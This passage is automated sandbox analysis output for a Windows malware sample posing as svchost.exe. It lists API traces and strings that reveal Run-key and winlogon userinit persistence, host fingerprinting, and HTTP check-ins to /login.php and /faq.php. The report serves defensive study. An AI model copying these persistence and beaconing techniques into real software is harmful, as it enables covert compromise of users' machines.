                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(?), ref: 02C86AA7
                                                                                                                                                                                                            • RegCloseKey.KERNEL32(?), ref: 02C86AB1
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C86AB7
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,?), ref: 02C86AED
                                                                                                                                                                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 02C86AFC
                                                                                                                                                                                                            • RegNotifyChangeKeyValue.KERNEL32(?,00000000,0000000F,00000000,00000001), ref: 02C86B19
                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C86B24
                                                                                                                                                                                                            • RegNotifyChangeKeyValue.ADVAPI32(?,00000000,0000000F,00000000,00000001), ref: 02C86B47
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: HeapValue$OpenProcess$ChangeFlushNotifyQuery$AdminAllocCloseCreateEventExistsFileFreeObjectPathSingleUserValidateWaitmemset
                                                                                                                                                                                                            • String ID: ,$C:\Windows\apppatch\svchost.exe$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 2213373080-1283825033
                                                                                                                                                                                                            • Opcode ID: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
                                                                                                                                                                                                            • Instruction ID: 8822c7c67e2016f5214d1eb9464f0d1547cdcdbd9c47378666bae36805e27dd0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf019f43bef0af59052552b5b09ef3271221621f387e42b16880c8e3a12a44c3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C071D971E84245BBEB119B649C49FBBB76CDF84708F208694F941BB280DBB1DA05C7A0

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C75CA0
                                                                                                                                                                                                              • Part of subcall function 02C839C0: memset.MSVCRT ref: 02C839F2
                                                                                                                                                                                                              • Part of subcall function 02C839C0: InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                              • Part of subcall function 02C839C0: InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                              • Part of subcall function 02C839C0: HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75CE7
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75CF6
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75CFF
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D09
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75D27
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D33
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75D3C
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D46
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75D64
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D71
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75D7B
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75D86
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75DA9
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75DB6
                                                                                                                                                                                                            • calloc.MSVCRT ref: 02C75DC0
                                                                                                                                                                                                            • exit.MSVCRT ref: 02C75DCF
                                                                                                                                                                                                            • _strrev.MSVCRT ref: 02C75E39
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C76406,?), ref: 02C75EFC
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C75EFF
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C75F0C
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C75F0F
                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(02C76406,02C76406,/login.php,02C76406,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 02C75F1A
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(02C76406,00000000,?,00000000,00000000), ref: 02C75F2B
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(02C76406,?,00000000,00000000), ref: 02C75F32
                                                                                                                                                                                                              • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                              • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                              • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                              • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                              • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                              • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                              • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                              • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • 10001, xrefs: 02C75DFA
                                                                                                                                                                                                            • 6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9, xrefs: 02C75DDD
                                                                                                                                                                                                            • /login.php, xrefs: 02C75CB1
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
• Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$callocexit$File$Process$memset$FreeHandleInternetOpenValidate$AllocateAttributesCloseConnectCreateDeleteExistsHttpInformationPathReadRequestSizeWrite_strrev
                                                                                                                                                                                                            • String ID: /login.php$10001$6908741AF4E26C68E1EE46F1041F009EECA931D2D53E11AD04CF03DEB7677754725005219D4B978D957ABA1678D353DE5AA0586B49E21F7EFFE2F73D7D2D8E26395286E1EA7A106CD617966D9FC5906C6E952289B4D671BA6ADE1B80ECF2468552F401D4D8134CAF4B56DC5F18B673710974A6F7A9AE9273979C092F52E8D7C9

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C855B1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-000000F0,?,00000000), ref: 02C855E7
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C855EE
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C85603
                                                                                                                                                                                                            • GetTimeZoneInformation.KERNEL32(00000000,?,?,00000000), ref: 02C85612
                                                                                                                                                                                                            • Sleep.KERNEL32(000001F4), ref: 02C85626
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02C8564C
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02C8568A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C856C6
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02C856DB
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02C856F3
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 02C85702
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8570F
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85771
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C85778
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C85785
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8578C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C857DE
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C857E1
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C857EE
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C857F1
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000000,00000001,00000000,/faq.php,?,00000001,?,02CB7A90,00000001,00000000), ref: 02C85800
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02C8580D
                                                                                                                                                                                                            • Sleep.KERNEL32(?,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85851
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsNetworkAlive.SENSAPI(02C763DD,00000000), ref: 02C83DA3
                                                                                                                                                                                                              • Part of subcall function 02C83D90: IsUserAnAdmin.SHELL32 ref: 02C83DB1
                                                                                                                                                                                                              • Part of subcall function 02C83D90: DnsFlushResolverCache.DNSAPI ref: 02C83DBB
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83DD8
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,00000000,00000000), ref: 02C83DF7
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.bing.com,00000104), ref: 02C83E10
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E23
                                                                                                                                                                                                              • Part of subcall function 02C83D90: memset.MSVCRT ref: 02C83E3C
                                                                                                                                                                                                              • Part of subcall function 02C83D90: lstrcpynA.KERNEL32(00000000,http://,00000104,?,?,?,?,00000000,00000000), ref: 02C83E55
                                                                                                                                                                                                              • Part of subcall function 02C83D90: StrNCatA.SHLWAPI(00000000,www.microsoft.com,00000104), ref: 02C83E68
                                                                                                                                                                                                              • Part of subcall function 02C83D90: InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02C83E75
                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,00000000,/faq.php,?,00000001,?,02CB7A8C,00000001,00000000), ref: 02C85873
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d, xrefs: 02C856BF
                                                                                                                                                                                                            • /faq.php, xrefs: 02C857AC
                                                                                                                                                                                                            • %2b, xrefs: 02C8563C
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$FileProcess$memset$Sleep$AdminAttributesCheckConnectionDeleteFreeInternetTempUserValidatelstrcpyn$AliveAllocCacheCountFlushInformationNameNetworkPathResolverTickTimeZone_snprintf
                                                                                                                                                                                                            • String ID: %2b$/faq.php$id=%s&ver=4.0.1&up=%u&os=%03u&rights=%s&ltime=%s%d&token=%d

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),00000000,00000000,00000000,04000000), ref: 02C83A7E
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C83A9F
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,00000000,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83AD5
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83B0B
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83B1A
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C83B38
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C83B50
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,02C76406,?), ref: 02C83B5F
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,00000000,00000004,?), ref: 02C83B7F
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83BB3
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83BD7
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000), ref: 02C83BDA
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83BF2
                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,00000000,00001000,00000000), ref: 02C83C0F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02C83C30
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C39
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83C3C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C49
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83C4C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C5A
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83C5D
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83C6A
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83C6D
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C83C83
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C83C94
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02C83D10
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83D13
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83D20
                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(00000000), ref: 02C83D23
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83D2D
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83D3A
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83D44
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02C83B05
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02C83ACD
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C83B27
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02C83B14
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C83A79
                                                                                                                                                                                                            • 3abfb9076ff185e9, xrefs: 02C83B22
                                                                                                                                                                                                            • POST, xrefs: 02C83ABD, 02C83AD3
                                                                                                                                                                                                            • GET, xrefs: 02C83AB6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocateConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: 3abfb9076ff185e9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                            • API String ID: 4276495747-2068853992
                                                                                                                                                                                                            • Opcode ID: 51e6f5eccb3457e7495455a5e4831cf5c557961665de695fa89b0146f4495580
                                                                                                                                                                                                            • Instruction ID: 03b87ba596479fec21a927c15e461ff520d988b86805412e4964db04f359d503
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 51e6f5eccb3457e7495455a5e4831cf5c557961665de695fa89b0146f4495580
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8951B771A802847BEB219F50CC49FEB7B68EF84B18F104698FA05B71C0D7B0AA55CB65

                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0),02C76406,00000000,00000000,04000000), ref: 02C836E1
                                                                                                                                                                                                            • InternetConnectA.WININET(00000000,00000000,00000050,00000000,00000000,00000003,00000000,00000001), ref: 02C836FF
                                                                                                                                                                                                            • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.0,00000000,00000000,00000000,00000001), ref: 02C83731
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Content-Type: application/x-www-form-urlencoded,000000FF,20000000), ref: 02C83762
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,Referer: http://www.google.com,000000FF,20000000), ref: 02C83771
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02C8378E
                                                                                                                                                                                                            • HttpAddRequestHeadersA.WININET(00000000,?,000000FF,20000000), ref: 02C837A6
                                                                                                                                                                                                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000004,00000000), ref: 02C837B3
                                                                                                                                                                                                            • HttpQueryInfoA.WININET(00000000,20000013,02C76406,00000004,02C76406), ref: 02C837D3
                                                                                                                                                                                                            • CreateFileA.KERNEL32(02C76406,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 02C83809
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00001010), ref: 02C83827
                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 02C8382A
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C83842
                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,00001000,00000001), ref: 02C8385F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000001,00000000), ref: 02C83880
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83889
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C8388C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C83899
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C8389C
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838AA
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C838AD
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C838BA
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C838BD
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000001), ref: 02C838D3
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02C838E4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02C8395F
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02C83962
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C8396F
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02C83972
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C8397C
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83986
                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 02C83990
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • Content-Type: application/x-www-form-urlencoded, xrefs: 02C8375C
                                                                                                                                                                                                            • HTTP/1.0, xrefs: 02C83729
                                                                                                                                                                                                            • Content-Type: multipart/form-data; boundary=---------------------------%s, xrefs: 02C8377D
                                                                                                                                                                                                            • Referer: http://www.google.com, xrefs: 02C8376B
                                                                                                                                                                                                            • Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0), xrefs: 02C836DC
                                                                                                                                                                                                            • 3abfb9076ff185e9, xrefs: 02C83778
                                                                                                                                                                                                            • POST, xrefs: 02C8371C, 02C8372F
                                                                                                                                                                                                            • GET, xrefs: 02C83712
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            • Associated: 00000002.00000002.2692265840.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Heap$Process$HttpInternet$HandleRequest$Close$FileFreeHeadersValidate$Open$AllocConnectCreateInfoInformationQueryReadSendWrite_snprintfmemset
                                                                                                                                                                                                            • String ID: 3abfb9076ff185e9$Content-Type: application/x-www-form-urlencoded$Content-Type: multipart/form-data; boundary=---------------------------%s$GET$HTTP/1.0$Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)$POST$Referer: http://www.google.com
                                                                                                                                                                                                            • API String ID: 4235660723-2068853992
                                                                                                                                                                                                            • Opcode ID: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
                                                                                                                                                                                                            • Instruction ID: 14c700ebed10ca15fb36dad9405ebaab1b16be7677af05c9bd8b66d4237764b5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: f792555316b6eb55b19c4c9f6b3892df755008ce3cf4a75a5b66fb121d0ac0ad
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5351A7719402847BEB219F54DC89FFB776CEF88B58F008658F905A71C0D7709A55CBA1
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02C73126
                                                                                                                                                                                                              • Part of subcall function 02C934A0: memset.MSVCRT ref: 02C934D3
                                                                                                                                                                                                              • Part of subcall function 02C934A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C934E2
                                                                                                                                                                                                              • Part of subcall function 02C934A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C934E9
                                                                                                                                                                                                              • Part of subcall function 02C934A0: memset.MSVCRT ref: 02C93501
                                                                                                                                                                                                              • Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C93518
                                                                                                                                                                                                              • Part of subcall function 02C934A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9351E
                                                                                                                                                                                                              • Part of subcall function 02C934A0: GetUserNameA.ADVAPI32(00000000,00000104), ref: 02C9353F
                                                                                                                                                                                                              • Part of subcall function 02C934A0: StrChrIA.SHLWAPI(?,?,7744C3F0,00000000,?,?,?,?,00000000), ref: 02C93566
                                                                                                                                                                                                              • Part of subcall function 02C934A0: lstrcpynA.KERNEL32(7744C3F0,00000001,00000104,?,7744C3F0,00000000,?,?,?,?,00000000), ref: 02C9357A
                                                                                                                                                                                                              • Part of subcall function 02C935A0: memset.MSVCRT ref: 02C935D4
                                                                                                                                                                                                              • Part of subcall function 02C935A0: GetProcessHeap.KERNEL32(00000008,00000110,?,00000000), ref: 02C935E3
                                                                                                                                                                                                              • Part of subcall function 02C935A0: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 02C935EA
                                                                                                                                                                                                              • Part of subcall function 02C935A0: memset.MSVCRT ref: 02C93602
                                                                                                                                                                                                              • Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93619
                                                                                                                                                                                                              • Part of subcall function 02C935A0: GetLastError.KERNEL32(?,?,?,?,00000000), ref: 02C9361F
                                                                                                                                                                                                              • Part of subcall function 02C935A0: GetComputerNameA.KERNEL32(00000000,00000104), ref: 02C93640
                                                                                                                                                                                                              • Part of subcall function 02C935A0: StrChrIA.SHLWAPI(?,?,00000000,00000000,?,?,?,?,00000000), ref: 02C93667
                                                                                                                                                                                                              • Part of subcall function 02C935A0: lstrcpynA.KERNEL32(00000000,00000001,00000104,?,00000000,00000000,?,?,?,?,00000000), ref: 02C9367B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104,?,?,75572F70,7744C3F0), ref: 02C73164
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?,?,?,75572F70,7744C3F0), ref: 02C73171
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,75572F70,7744C3F0), ref: 02C73188
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00000101,?,?,?,75572F70,7744C3F0), ref: 02C731AE
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(?,InstallDate,00000000,?,02C8598D,?,?,?,75572F70,7744C3F0), ref: 02C731CF
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,75572F70,7744C3F0), ref: 02C731D9
